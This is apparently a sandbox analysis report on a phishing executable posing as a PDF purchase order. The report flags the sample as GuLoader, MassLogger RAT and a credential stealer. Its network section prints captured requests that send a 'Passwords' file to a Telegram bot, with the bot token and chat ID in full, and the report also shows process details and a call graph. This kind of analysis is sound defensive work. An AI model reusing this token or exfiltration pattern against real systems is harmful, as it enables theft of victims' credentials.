                                                                                                                                  2024-12-19 14:31:01 UTC296OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd26d9ff1bf1b4
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-19 14:31:01 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 36 64 39 66 66 31 62 66 31 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd26d9ff1bf1b4Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-19 14:31:01 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Thu, 19 Dec 2024 14:31:01 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 543
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-19 14:31:01 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 36 36 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":19687,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618661,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  21192.168.2.549979149.154.167.2204434796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-19 14:31:06 UTC296OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd27d060a159d9
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-19 14:31:06 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 37 64 30 36 30 61 31 35 39 64 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd27d060a159d9Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-19 14:31:07 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Thu, 19 Dec 2024 14:31:06 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 541
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-19 14:31:07 UTC541INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 36 36 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":19689,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618666,"document":{"file_n


                                                                                                                                  Click to jump to process

                                                                                                                                  Click to jump to process

                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                  Click to jump to process

                                                                                                                                  Target ID:0
                                                                                                                                  Start time:09:28:58
                                                                                                                                  Start date:19/12/2024
                                                                                                                                  Path:C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe"
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:477'600 bytes
                                                                                                                                  MD5 hash:745504717878BB22B600DF7E2C2DD9F4
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2205388503.0000000002BCC000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:3
                                                                                                                                  Start time:09:29:14
                                                                                                                                  Start date:19/12/2024
                                                                                                                                  Path:C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe"
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:477'600 bytes
                                                                                                                                  MD5 hash:745504717878BB22B600DF7E2C2DD9F4
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.3312322172.0000000032CCB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3312322172.0000000032CCB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3312322172.0000000032CCB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:false

                                                                                                                                  Reset < >

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:21.4%
                                                                                                                                    Dynamic/Decrypted Code Coverage:13.9%
                                                                                                                                    Signature Coverage:25%
                                                                                                                                    Total number of Nodes:1517
                                                                                                                                    Total number of Limit Nodes:46
                                                                                                                                    execution_graph 4778 10001000 4781 1000101b 4778->4781 4788 10001516 4781->4788 4783 10001020 4784 10001024 4783->4784 4785 10001027 GlobalAlloc 4783->4785 4786 1000153d 3 API calls 4784->4786 4785->4784 4787 10001019 4786->4787 4790 1000151c 4788->4790 4789 10001522 4789->4783 4790->4789 4791 1000152e GlobalFree 4790->4791 4791->4783 4792 402840 4793 402bbf 18 API calls 4792->4793 4795 40284e 4793->4795 4794 402864 4797 405c05 2 API calls 4794->4797 4795->4794 4796 402bbf 18 API calls 4795->4796 4796->4794 4798 40286a 4797->4798 4820 405c2a GetFileAttributesW CreateFileW 4798->4820 4800 402877 4801 402883 GlobalAlloc 4800->4801 4802 40291a 4800->4802 4805 402911 CloseHandle 4801->4805 4806 40289c 4801->4806 4803 402922 DeleteFileW 4802->4803 4804 402935 4802->4804 4803->4804 4805->4802 4821 403258 SetFilePointer 4806->4821 4808 4028a2 4809 403242 ReadFile 4808->4809 4810 4028ab GlobalAlloc 4809->4810 4811 4028bb 4810->4811 4812 4028ef 4810->4812 4813 403027 32 API calls 4811->4813 4814 405cdc WriteFile 4812->4814 4819 4028c8 4813->4819 4815 4028fb GlobalFree 4814->4815 4816 403027 32 API calls 4815->4816 4817 40290e 4816->4817 4817->4805 4818 4028e6 GlobalFree 4818->4812 4819->4818 4820->4800 4821->4808 4822 401cc0 4823 402ba2 18 API calls 4822->4823 4824 401cc7 4823->4824 4825 402ba2 18 API calls 4824->4825 4826 401ccf GetDlgItem 4825->4826 4827 402531 4826->4827 4828 4029c0 4829 402ba2 18 API calls 4828->4829 4830 4029c6 4829->4830 4831 4029f9 4830->4831 4833 40281e 4830->4833 4834 4029d4 4830->4834 4832 406077 18 API calls 4831->4832 4831->4833 4832->4833 4834->4833 4836 405f9c wsprintfW 4834->4836 4836->4833 4198 403c41 4199 403d94 4198->4199 4200 403c59 4198->4200 4202 403de5 4199->4202 4203 403da5 GetDlgItem GetDlgItem 4199->4203 4200->4199 4201 403c65 4200->4201 4205 403c70 SetWindowPos 4201->4205 4206 403c83 4201->4206 4204 403e3f 4202->4204 4212 401389 2 API calls 4202->4212 4207 404119 19 API calls 4203->4207 4208 404165 SendMessageW 4204->4208 4229 403d8f 4204->4229 4205->4206 4209 403ca0 4206->4209 4210 403c88 ShowWindow 4206->4210 4211 403dcf SetClassLongW 4207->4211 4241 403e51 4208->4241 4213 403cc2 4209->4213 4214 403ca8 DestroyWindow 4209->4214 4210->4209 4215 40140b 2 API calls 4211->4215 4216 403e17 4212->4216 4218 403cc7 SetWindowLongW 4213->4218 4219 403cd8 4213->4219 4217 4040c3 4214->4217 4215->4202 4216->4204 4222 403e1b SendMessageW 4216->4222 4228 4040d3 ShowWindow 4217->4228 4217->4229 4218->4229 4220 403d81 4219->4220 4221 403ce4 GetDlgItem 4219->4221 4278 404180 4220->4278 4225 403d14 4221->4225 4226 403cf7 SendMessageW IsWindowEnabled 4221->4226 4222->4229 4223 40140b 2 API calls 4223->4241 4224 4040a4 DestroyWindow EndDialog 4224->4217 4231 403d21 4225->4231 4232 403d68 SendMessageW 4225->4232 4233 403d34 4225->4233 4243 403d19 4225->4243 4226->4225 4226->4229 4228->4229 4230 406077 18 API calls 4230->4241 4231->4232 4231->4243 4232->4220 4236 403d51 4233->4236 4237 403d3c 4233->4237 4235 403d4f 4235->4220 4239 40140b 2 API calls 4236->4239 4240 40140b 2 API calls 4237->4240 4238 404119 19 API calls 4238->4241 4242 403d58 4239->4242 4240->4243 4241->4223 4241->4224 4241->4229 4241->4230 4241->4238 4259 403fe4 DestroyWindow 4241->4259 4269 404119 4241->4269 4242->4220 4242->4243 4275 4040f2 4243->4275 4245 403ecc GetDlgItem 4246 403ee1 4245->4246 4247 403ee9 ShowWindow KiUserCallbackDispatcher 4245->4247 4246->4247 4272 40413b EnableWindow 4247->4272 4249 403f13 EnableWindow 4252 403f27 4249->4252 4250 403f2c GetSystemMenu EnableMenuItem SendMessageW 4251 403f5c SendMessageW 4250->4251 4250->4252 4251->4252 4252->4250 4273 40414e SendMessageW 4252->4273 4274 406055 lstrcpynW 4252->4274 4255 403f8a lstrlenW 4256 406077 18 API calls 4255->4256 4257 403fa0 SetWindowTextW 4256->4257 4258 401389 2 API calls 4257->4258 4258->4241 4259->4217 4260 403ffe CreateDialogParamW 4259->4260 4260->4217 4261 404031 4260->4261 4262 404119 19 API calls 4261->4262 4263 40403c GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4262->4263 4264 401389 2 API calls 4263->4264 4265 404082 4264->4265 4265->4229 4266 40408a ShowWindow 4265->4266 4267 404165 SendMessageW 4266->4267 4268 4040a2 4267->4268 4268->4217 4270 406077 18 API calls 4269->4270 4271 404124 SetDlgItemTextW 4270->4271 4271->4245 4272->4249 4273->4252 4274->4255 4276 4040f9 4275->4276 4277 4040ff SendMessageW 4275->4277 4276->4277 4277->4235 4279 404198 GetWindowLongW 4278->4279 4289 404221 4278->4289 4280 4041a9 4279->4280 4279->4289 4281 4041b8 GetSysColor 4280->4281 4282 4041bb 4280->4282 4281->4282 4283 4041c1 SetTextColor 4282->4283 4284 4041cb SetBkMode 4282->4284 4283->4284 4285 4041e3 GetSysColor 4284->4285 4286 4041e9 4284->4286 4285->4286 4287 4041f0 SetBkColor 4286->4287 4288 4041fa 4286->4288 4287->4288 4288->4289 4290 404214 CreateBrushIndirect 4288->4290 4291 40420d DeleteObject 4288->4291 4289->4229 4290->4289 4291->4290 4292 401fc3 4293 401fd5 4292->4293 4302 402087 4292->4302 4315 402bbf 4293->4315 4295 401423 25 API calls 4303 4021e1 4295->4303 4297 402bbf 18 API calls 4298 401fe5 4297->4298 4299 401ffb LoadLibraryExW 4298->4299 4300 401fed GetModuleHandleW 4298->4300 4301 40200c 4299->4301 4299->4302 4300->4299 4300->4301 4321 40649a WideCharToMultiByte 4301->4321 4302->4295 4306 402056 4310 4051b4 25 API calls 4306->4310 4307 40201d 4308 402025 4307->4308 4309 40203c 4307->4309 4366 401423 4308->4366 4324 10001759 4309->4324 4312 40202d 4310->4312 4312->4303 4313 402079 FreeLibrary 4312->4313 4313->4303 4316 402bcb 4315->4316 4317 406077 18 API calls 4316->4317 4318 402bec 4317->4318 4319 401fdc 4318->4319 4320 4062e9 5 API calls 4318->4320 4319->4297 4320->4319 4322 4064c4 GetProcAddress 4321->4322 4323 402017 4321->4323 4322->4323 4323->4306 4323->4307 4325 10001789 4324->4325 4369 10001b18 4325->4369 4327 100018a6 4327->4312 4328 10001790 4328->4327 4329 100017a1 4328->4329 4330 100017a8 4328->4330 4418 10002286 4329->4418 4401 100022d0 4330->4401 4335 1000180c 4339 10001812 4335->4339 4340 1000184e 4335->4340 4336 100017ee 4431 100024a9 4336->4431 4337 100017d7 4350 100017cd 4337->4350 4428 10002b5f 4337->4428 4338 100017be 4342 100017c4 4338->4342 4343 100017cf 4338->4343 4345 100015b4 3 API calls 4339->4345 4347 100024a9 10 API calls 4340->4347 4342->4350 4412 100028a4 4342->4412 4422 10002645 4343->4422 4352 10001828 4345->4352 4353 10001840 4347->4353 4348 100017f4 4442 100015b4 4348->4442 4350->4335 4350->4336 4356 100024a9 10 API calls 4352->4356 4358 10001895 4353->4358 4453 1000246c 4353->4453 4355 100017d5 4355->4350 4356->4353 4358->4327 4360 1000189f GlobalFree 4358->4360 4360->4327 4363 10001881 4363->4358 4457 1000153d wsprintfW 4363->4457 4364 1000187a FreeLibrary 4364->4363 4367 4051b4 25 API calls 4366->4367 4368 401431 4367->4368 4368->4312 4460 1000121b GlobalAlloc 4369->4460 4371 10001b3c 4461 1000121b GlobalAlloc 4371->4461 4373 10001d7a GlobalFree GlobalFree GlobalFree 4374 10001d97 4373->4374 4391 10001de1 4373->4391 4375 100020ee 4374->4375 4383 10001dac 4374->4383 4374->4391 4377 10002110 GetModuleHandleW 4375->4377 4375->4391 4376 10001c1d GlobalAlloc 4394 10001b47 4376->4394 4379 10002121 LoadLibraryW 4377->4379 4380 10002136 4377->4380 4378 10001c86 GlobalFree 4378->4394 4379->4380 4379->4391 4468 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4380->4468 4381 10001c68 lstrcpyW 4384 10001c72 lstrcpyW 4381->4384 4383->4391 4464 1000122c 4383->4464 4384->4394 4385 10002188 4387 10002195 lstrlenW 4385->4387 4385->4391 4386 10002048 4386->4391 4395 10002090 lstrcpyW 4386->4395 4469 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4387->4469 4391->4328 4392 10002148 4392->4385 4400 10002172 GetProcAddress 4392->4400 4393 100021af 4393->4391 4394->4373 4394->4376 4394->4378 4394->4381 4394->4384 4394->4386 4394->4391 4396 10001cc4 4394->4396 4397 10001f37 GlobalFree 4394->4397 4399 1000122c 2 API calls 4394->4399 4467 1000121b GlobalAlloc 4394->4467 4395->4391 4396->4394 4462 1000158f GlobalSize GlobalAlloc 4396->4462 4397->4394 4399->4394 4400->4385 4408 100022e8 4401->4408 4403 10002415 GlobalFree 4407 100017ae 4403->4407 4403->4408 4404 100023d3 lstrlenW 4404->4403 4411 100023de 4404->4411 4405 100023ba GlobalAlloc CLSIDFromString 4405->4403 4406 1000238f GlobalAlloc WideCharToMultiByte 4406->4403 4407->4337 4407->4338 4407->4350 4408->4403 4408->4404 4408->4405 4408->4406 4409 1000122c GlobalAlloc lstrcpynW 4408->4409 4471 100012ba 4408->4471 4409->4408 4411->4403 4475 100025d9 4411->4475 4414 100028b6 4412->4414 4413 1000295b VirtualAlloc 4415 10002979 4413->4415 4414->4413 4416 10002a75 4415->4416 4417 10002a6a GetLastError 4415->4417 4416->4350 4417->4416 4419 10002296 4418->4419 4420 100017a7 4418->4420 4419->4420 4421 100022a8 GlobalAlloc 4419->4421 4420->4330 4421->4419 4426 10002661 4422->4426 4423 100026b2 GlobalAlloc 4427 100026d4 4423->4427 4424 100026c5 4425 100026ca GlobalSize 4424->4425 4424->4427 4425->4427 4426->4423 4426->4424 4427->4355 4429 10002b6a 4428->4429 4430 10002baa GlobalFree 4429->4430 4478 1000121b GlobalAlloc 4431->4478 4433 10002530 StringFromGUID2 4435 100024b3 4433->4435 4434 10002541 lstrcpynW 4434->4435 4435->4433 4435->4434 4436 1000250b MultiByteToWideChar 4435->4436 4437 10002554 wsprintfW 4435->4437 4438 10002571 GlobalFree 4435->4438 4439 100025ac GlobalFree 4435->4439 4440 10001272 2 API calls 4435->4440 4479 100012e1 4435->4479 4436->4435 4437->4435 4438->4435 4439->4348 4440->4435 4483 1000121b GlobalAlloc 4442->4483 4444 100015ba 4445 100015c7 lstrcpyW 4444->4445 4447 100015e1 4444->4447 4448 100015fb 4445->4448 4447->4448 4449 100015e6 wsprintfW 4447->4449 4450 10001272 4448->4450 4449->4448 4451 100012b5 GlobalFree 4450->4451 4452 1000127b GlobalAlloc lstrcpynW 4450->4452 4451->4353 4452->4451 4454 1000247a 4453->4454 4455 10001861 4453->4455 4454->4455 4456 10002496 GlobalFree 4454->4456 4455->4363 4455->4364 4456->4454 4458 10001272 2 API calls 4457->4458 4459 1000155e 4458->4459 4459->4358 4460->4371 4461->4394 4463 100015ad 4462->4463 4463->4396 4470 1000121b GlobalAlloc 4464->4470 4466 1000123b lstrcpynW 4466->4391 4467->4394 4468->4392 4469->4393 4470->4466 4472 100012c1 4471->4472 4473 1000122c 2 API calls 4472->4473 4474 100012df 4473->4474 4474->4408 4476 100025e7 VirtualAlloc 4475->4476 4477 1000263d 4475->4477 4476->4477 4477->4411 4478->4435 4480 100012ea 4479->4480 4481 1000130c 4479->4481 4480->4481 4482 100012f0 lstrcpyW 4480->4482 4481->4435 4482->4481 4483->4444 4837 4016c4 4838 402bbf 18 API calls 4837->4838 4839 4016ca GetFullPathNameW 4838->4839 4840 4016e4 4839->4840 4841 401706 4839->4841 4840->4841 4844 406398 2 API calls 4840->4844 4842 40171b GetShortPathNameW 4841->4842 4843 402a4c 4841->4843 4842->4843 4845 4016f6 4844->4845 4845->4841 4847 406055 lstrcpynW 4845->4847 4847->4841 4848 4014cb 4849 4051b4 25 API calls 4848->4849 4850 4014d2 4849->4850 4851 40194e 4852 402bbf 18 API calls 4851->4852 4853 401955 lstrlenW 4852->4853 4854 402531 4853->4854 4855 4027ce 4856 4027d6 4855->4856 4857 4027da FindNextFileW 4856->4857 4860 4027ec 4856->4860 4858 402833 4857->4858 4857->4860 4861 406055 lstrcpynW 4858->4861 4861->4860 4681 401754 4682 402bbf 18 API calls 4681->4682 4683 40175b 4682->4683 4684 405c59 2 API calls 4683->4684 4685 401762 4684->4685 4686 405c59 2 API calls 4685->4686 4686->4685 4862 401d56 GetDC GetDeviceCaps 4863 402ba2 18 API calls 4862->4863 4864 401d74 MulDiv ReleaseDC 4863->4864 4865 402ba2 18 API calls 4864->4865 4866 401d93 4865->4866 4867 406077 18 API calls 4866->4867 4868 401dcc CreateFontIndirectW 4867->4868 4869 402531 4868->4869 4870 401a57 4871 402ba2 18 API calls 4870->4871 4872 401a5d 4871->4872 4873 402ba2 18 API calls 4872->4873 4874 401a05 4873->4874 4875 4014d7 4876 402ba2 18 API calls 4875->4876 4877 4014dd Sleep 4876->4877 4879 402a4c 4877->4879 4880 40155b 4881 4029f2 4880->4881 4884 405f9c wsprintfW 4881->4884 4883 4029f7 4884->4883 4760 401ddc 4761 402ba2 18 API calls 4760->4761 4762 401de2 4761->4762 4763 402ba2 18 API calls 4762->4763 4764 401deb 4763->4764 4765 401df2 ShowWindow 4764->4765 4766 401dfd EnableWindow 4764->4766 4767 402a4c 4765->4767 4766->4767 4885 40385c 4886 403867 4885->4886 4887 40386b 4886->4887 4888 40386e GlobalAlloc 4886->4888 4888->4887 4889 4022df 4890 402bbf 18 API calls 4889->4890 4891 4022ee 4890->4891 4892 402bbf 18 API calls 4891->4892 4893 4022f7 4892->4893 4894 402bbf 18 API calls 4893->4894 4895 402301 GetPrivateProfileStringW 4894->4895 4896 401bdf 4897 402ba2 18 API calls 4896->4897 4898 401be6 4897->4898 4899 402ba2 18 API calls 4898->4899 4900 401bf0 4899->4900 4901 401c00 4900->4901 4903 402bbf 18 API calls 4900->4903 4902 401c10 4901->4902 4904 402bbf 18 API calls 4901->4904 4905 401c1b 4902->4905 4906 401c5f 4902->4906 4903->4901 4904->4902 4907 402ba2 18 API calls 4905->4907 4908 402bbf 18 API calls 4906->4908 4909 401c20 4907->4909 4910 401c64 4908->4910 4912 402ba2 18 API calls 4909->4912 4911 402bbf 18 API calls 4910->4911 4913 401c6d FindWindowExW 4911->4913 4914 401c29 4912->4914 4917 401c8f 4913->4917 4915 401c31 SendMessageTimeoutW 4914->4915 4916 401c4f SendMessageW 4914->4916 4915->4917 4916->4917 4918 401960 4919 402ba2 18 API calls 4918->4919 4920 401967 4919->4920 4921 402ba2 18 API calls 4920->4921 4922 401971 4921->4922 4923 402bbf 18 API calls 4922->4923 4924 40197a 4923->4924 4925 40198e lstrlenW 4924->4925 4926 4019ca 4924->4926 4927 401998 4925->4927 4927->4926 4931 406055 lstrcpynW 4927->4931 4929 4019b3 4929->4926 4930 4019c0 lstrlenW 4929->4930 4930->4926 4931->4929 4932 401662 4933 402bbf 18 API calls 4932->4933 4934 401668 4933->4934 4935 406398 2 API calls 4934->4935 4936 40166e 4935->4936 4937 4019e4 4938 402bbf 18 API calls 4937->4938 4939 4019eb 4938->4939 4940 402bbf 18 API calls 4939->4940 4941 4019f4 4940->4941 4942 4019fb lstrcmpiW 4941->4942 4943 401a0d lstrcmpW 4941->4943 4944 401a01 4942->4944 4943->4944 4484 4025e5 4498 402ba2 4484->4498 4486 40263a ReadFile 4493 4025f4 4486->4493 4497 40272d 4486->4497 4487 4026d3 4487->4493 4487->4497 4501 405d0b SetFilePointer 4487->4501 4488 405cad ReadFile 4488->4493 4490 40267a MultiByteToWideChar 4490->4493 4491 40272f 4510 405f9c wsprintfW 4491->4510 4493->4486 4493->4487 4493->4488 4493->4490 4493->4491 4494 4026a0 SetFilePointer MultiByteToWideChar 4493->4494 4495 402740 4493->4495 4493->4497 4494->4493 4496 402761 SetFilePointer 4495->4496 4495->4497 4496->4497 4499 406077 18 API calls 4498->4499 4500 402bb6 4499->4500 4500->4493 4502 405d27 4501->4502 4504 405d43 4501->4504 4503 405cad ReadFile 4502->4503 4505 405d33 4503->4505 4504->4487 4505->4504 4506 405d74 SetFilePointer 4505->4506 4507 405d4c SetFilePointer 4505->4507 4506->4504 4507->4506 4508 405d57 4507->4508 4509 405cdc WriteFile 4508->4509 4509->4504 4510->4497 4945 401e66 4946 402bbf 18 API calls 4945->4946 4947 401e6c 4946->4947 4948 4051b4 25 API calls 4947->4948 4949 401e76 4948->4949 4950 405735 2 API calls 4949->4950 4951 401e7c 4950->4951 4952 401edb CloseHandle 4951->4952 4953 401e8c WaitForSingleObject 4951->4953 4954 40281e 4951->4954 4952->4954 4955 401e9e 4953->4955 4956 401eb0 GetExitCodeProcess 4955->4956 4957 406467 2 API calls 4955->4957 4958 401ec2 4956->4958 4959 401ecd 4956->4959 4960 401ea5 WaitForSingleObject 4957->4960 4962 405f9c wsprintfW 4958->4962 4959->4952 4960->4955 4962->4959 4520 401767 4521 402bbf 18 API calls 4520->4521 4522 40176e 4521->4522 4523 401796 4522->4523 4524 40178e 4522->4524 4561 406055 lstrcpynW 4523->4561 4560 406055 lstrcpynW 4524->4560 4527 401794 4530 4062e9 5 API calls 4527->4530 4528 4017a1 4529 405a09 3 API calls 4528->4529 4531 4017a7 lstrcatW 4529->4531 4539 4017b3 4530->4539 4531->4527 4532 406398 2 API calls 4532->4539 4533 4017ef 4534 405c05 2 API calls 4533->4534 4534->4539 4536 4017c5 CompareFileTime 4536->4539 4537 401885 4538 4051b4 25 API calls 4537->4538 4541 40188f 4538->4541 4539->4532 4539->4533 4539->4536 4539->4537 4540 406055 lstrcpynW 4539->4540 4546 406077 18 API calls 4539->4546 4554 40579a MessageBoxIndirectW 4539->4554 4557 40185c 4539->4557 4559 405c2a GetFileAttributesW CreateFileW 4539->4559 4540->4539 4543 403027 32 API calls 4541->4543 4542 4051b4 25 API calls 4558 401871 4542->4558 4544 4018a2 4543->4544 4545 4018b6 SetFileTime 4544->4545 4547 4018c8 CloseHandle 4544->4547 4545->4547 4546->4539 4548 4018d9 4547->4548 4547->4558 4549 4018f1 4548->4549 4550 4018de 4548->4550 4552 406077 18 API calls 4549->4552 4551 406077 18 API calls 4550->4551 4555 4018e6 lstrcatW 4551->4555 4553 4018f9 4552->4553 4556 40579a MessageBoxIndirectW 4553->4556 4554->4539 4555->4553 4556->4558 4557->4542 4557->4558 4559->4539 4560->4527 